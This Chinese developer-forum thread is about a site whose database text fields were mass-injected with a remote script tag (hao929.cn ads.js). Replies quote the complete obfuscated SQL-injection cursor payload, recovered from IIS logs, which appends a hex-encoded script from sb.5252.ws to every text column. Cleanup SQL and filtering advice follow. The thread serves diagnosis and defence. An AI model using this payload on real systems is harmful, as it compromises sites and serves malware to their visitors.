郁闷网站被黑,所有文字字段被加入</title></</title></pre>"><script src=http://1.hao929.cn/ads.js></script><!--

问题描述

郁闷网站被黑,所有文字字段被加入</title></</title></pre>"><scriptsrc=http://1.hao929.cn/ads.js></script><!--大家有没有人,遇到过,怎么解决,关键是堵住漏洞不知道他是怎么办到的,怕以后又被黑网上查了不少地方,中这个的还不少,不过都没说是怎么被黑的,怎么堵漏洞在此先谢过大家

解决方案

解决方案二:
察看日志没有具体的环境不好帮你找
解决方案三:
iis的日志,我看了下,没有找到关于</title></</title></pre>"><scriptsrc=http://1.hao929.cn/ads.js></script><!--的关键字的记录,其他的注入语句到不少,但都没成功,不指导最近有没有这方面的黑客工具,会做到这些
解决方案四:
该回复于2008-05-08 14:44:36被版主删除
解决方案五:
感觉应该是SQL注入攻击
解决方案六:
不知道怎么上传文件,我想把IIs日志发上来,给大家看看,下午再说,先吃饭
解决方案七:
找到一段;dEcLaRe@tvArChAr(255),@cvArChAr(255)dEcLaRetAbLe_cursoRcUrSoRFoRsElEcTa.nAmE,b.nAmEFrOmsYsObJeCtSa,sYsCoLuMnSbwHeRea.iD=b.iDAnDa.xTyPe='u'AnD(b.xTyPe=99oRb.xTyPe=35oRb.xTyPe=231oRb.xTyPe=167)oPeNtAbLe_cursoRfEtChnextFrOmtAbLe_cursoRiNtO@t,@cwhile(@@fEtCh_status=0)bEgInexec('UpDaTe['+@t+']sEt['+@c+']=rtrim(convert(varchar,['+@c+']))+cAsT(0x3C2F7469746C653E3C2F7072653E3E3C736372697074207372633D687474703A2F2F73622E353235322E77733A38382F3130372F312E6A733E3C2F7363726970743E3C212D2DaSvArChAr(67))')fEtChnextFrOmtAbLe_cursoRiNtO@t,@ceNdcLoSetAbLe_cursoRdEAlLoCaTetAbLe_cursoR;--
解决方案八:
学编程还的把反编程也就是骇客攻击连接下!最近也看了比较多
解决方案九:
找到一篇文章最近我的网站常被人挂马,我不知道为什么,我去掉了一段时间论坛,后来就没中了,仔细一分析,发现原来是数据库常被人挂马了.以前说过的趋势挂马事件,MS这个挂马方法已经流行了很久,从去年就大规模开始了,在网上可以搜到很多痕迹。SQL语句如下:用游标遍历所有表里如下数据类型的字段,然后UPDATE挂马。(全部是允许写入字符的字段)xtype=99ntextxtype=35textxtype=231nvarcharxtype=167varchar———————YD的分割——————————–DECLARE@Tvarchar(255),@Cvarchar(255)DECLARETable_CursorCURSORFORSelecta.name,b.namefromsysobjectsa,syscolumnsbwherea.id=b.idanda.xtype=’u’and(b.xtype=99orb.xtype=35orb.xtype=231orb.xtype=167)OPENTable_CursorFETCHNEXTFROMTable_CursorINTO@T,@CWHILE(@@FETCH_STATUS=0)BEGINexec(’update[’+@T+’]set[’+@C+’]=rtrim(convert(varchar,[’+@C+’]))+”挂马内容”’)FETCHNEXTFROMTable_CursorINTO@T,@CENDCLOSETable_CursorDEALLOCATETable_Cursor
解决方案十:
注入了!
解决方案十一:
select'update'+b.[name]+'set'+a.[name]+'=replace('+a.[name]+',''</title></pre>"><scriptsrc=http://1.hao929.cn/ads.js></script><!--'','''')'fromsyscolumnsasa,sysobjectsasbwherea.[id]=b.[id]andb.xtype='U'anda.xtypein('231','35','99','167','175')orderbyb.[name]
解决方案十二:
那他们是利用那个权限或者怎么注入的呢?如何防范呢?
解决方案十三:
关注,怎么冲根本解决呢,10楼的别人换个地址就不行啦,暂时性的!
解决方案十四:
哈哈,被人挂马了。注意网站在提交参数的时候一定要过滤好字符串
解决方案十五:
怎么才能防止?高人请教啊~!
解决方案:
SQL注入
解决方案:
一般的字符过滤好象没什么用的!有解决到问题的没有?
解决方案:
什么SQL注入...明明就是跨站攻击....................................................................楼主记得传参用sqlparameter还要过滤掉危险字符..象<script>之类的,想都不想就过滤了...或者给他替换成全角的.
解决方案:
怕怕。最近老是有人在说自己网站被黑。看来我新学做的几个非常烂的网站。都没SQL过滤。要好好抽时间去过滤下。唉,一直都明白这是很大漏洞都懒去改。看来真的是不行了。

时间: 2024-10-26 04:58:22

郁闷网站被黑,所有文字字段被加入&amp;lt;/title&amp;gt;&amp;lt;/&amp;lt;/title&amp;gt;&amp;lt;/pre&amp;gt;&amp;quot;&amp;gt;&amp;lt;script src=http://1.hao929.cn/ads.js&amp;gt;&amp;lt;/script&amp;gt;&amp;lt;!--的相关文章

脚本-script src=&amp;amp;quot;/i/jquery.js?aaa 里面的aaa是什么意思

问题描述 script src="/i/jquery.js?aaa 里面的aaa是什么意思 引入js脚本的时候 遇到了下面的写法 aaa到底什么意思呢求解答script src=""/i/jquery.js?aaa 里面的aaa是什么意思 解决方案 aaa一般都用时间戳,让浏览器不使用缓存,重新请求文件 解决方案二: 一般是用来防止缓存的,也可能传入参数包含要导入的js脚本,当前加载的脚本获取参数后输出 解决方案三: 不清楚,没用过,大家一起学习 解决方案四: aaa是一个参

ASP+MSSQL2000,数据库被批量注入了 &amp;lt;Script Src=

这阵子,采用ASP+MSSQL设计的很多网站可能遭遇到sql数据库被挂马者插入JS木马的经历:这不,朋友的一个网站就被黑客忽悠了一把,mssql的每个varchar.text字段都被自动插入一段js代码,即使删除这段代码,如果没有从源头上解决,几分钟后,js代码就又会自动插入数据库.     经过飘易的观察,这很有可能是程序自动执行的,黑客先从搜索引擎google.百度等搜索存在漏洞的采用asp+mssql设计的网站,然后采用小明子这样的注入扫描工具,扫描整个网站,一旦发现有sql注入的漏洞或者

网站被黑的假象--ARP欺骗之页面中加入一段js_javascript技巧

昨天晚上发现访问我的网站的时候网页代码html的前面多了一串js代码.刚开始以为网站被黑了,赶紧到服务器上查看所有文件是否带有这串js代码,搜索结果没有,而且服务器也没发现被入侵的痕迹. <script src=http://fuck.ns2go.com/dir/index_pic/1.js></script> 于是只能从这段代码入手,我下载这个js开发发现是下面一段代码: 复制代码 代码如下: window["\x64\x6f\x63\x75\x6d\x65\x6e\x

互联网创业成功之道(五):网站被黑后的处理方法

中介交易 SEO诊断 淘宝客 云主机 技术大厅 网站建成后,维护和管理就成为了需要持续进行的工作.在本章中,将对网站的内部链接优化.高效维护.PR的提升方式进行介绍. 一.优化网站的内部链接 二.网站高效维护三大常识 三.提高网站PageRank有妙招 四.站点交换链接 也要谨防假冒 五.反对低俗 禁止网站的违规内容 六.简单配置 让网站服务器固若金汤 七.了解"蜘蛛" 提高网站收录 八.巧妙加快网页显示速度 九.提高域名PageRank的小技巧 十.避免杂乱 在线管理网站文件 十一.

网站被黑 站长的解决办法

中介交易 SEO诊断 淘宝客 云主机 技术大厅 最近单位网站在百度搜索点击打开都是黄色的,而直接输入网址反而没问题,在百度搜索中被提示为网站被黑的可能,很多客户搜索我们网站都进入了黄色网站,给公司的形象造成了很大的影响,作为公司的网站技术人员,以前也算是搞了5年的老站长了,什么事没惊着,从头开始分析网站被黑的原因. 百度的收录为基础 在百度Site下自己网站发现收录了许多色情类内容快照,什么电影,什么美女主播,看了收录足足300多条快照,再看下网站首页的收录,发现已经面目全非了,百度快照都是空的

商业网站中图片和文字那个重要?

What's more important to your web site: pictures or text? If you have an ecommerce web site, you need the answer to that question. Your profits depend on it. 图片与文本,哪项内容更重要呢?如果拥有商业网站,你需要回答这个问题,因为这关系到网站收益. Over the years, we've heard a lot of opinions

3步解决IIS网站安全防止网站被黑

网站被黑一般指网站被注入木马或黑链,注入方法多种多样,有SQL注入.有网站权限注入等等.下文笔者以IIS为例进行讲解该如何预防网站被黑的一些措施. 1.打开IIS信息服务管理器,在"网站"选项下选择需要设置的网站目录--属性,将网站目录data及upload设置为不可写入,执行权限设置为无(见图2). 2.将IIS网站主目录中的"脚本资源访问"."写入"."目录浏览"以及记录访问等选项设置勾选去除,右键网站目录---属性进入界

中国万网官方网站被黑 黑客留言调侃

11月20日消息,有网友在a5论坛发帖反映,万网官方网站页面被黑,黑客在被黑页面上写出了 "吃饱没事做 做饱没事吃 中国鹰派有万涛 万涛黑站有绝招 打开机房推开门 拿起锤头往上敲 BY AK "等字样. 用户发帖反映万网官方网站被黑页面 万网官方网站被黑页面 中国万网成立于1995年,是中国领先的互联网应用服务提供商,为企业客户提供完整的互联网应用服务,服务范围涵盖基础的域名服务.主机服务;企业邮箱.网站建设.网络营销.语音通信等应用服务 2009年9月,阿里巴巴以5.4亿投资万网,完

已修复漏洞仍导致6万网站被黑;美女黑客被无故扣污名 | 宅客周刊

      有些漏洞,明明已经修复了,却依然造成不小影响:有的漏洞,明明能造成不小影响,有人却迟迟不去修复. Wordpress内容注入漏洞致超67000个网站遭黑产利用 前不久,雷锋网报道过博客管理系统 WordPress 在4.7.1 版本存在一个严重漏洞,导致攻击者可以在没有密码登录的情况下强行修改网站的文章内容.在该篇报道之前,WordPress 团队已经发布了4.7.2版本,修复了该漏洞.雷锋网当时也提醒:有相当一部分网站没有开启自动更新,考虑到 WordPress 的使用者甚多,受影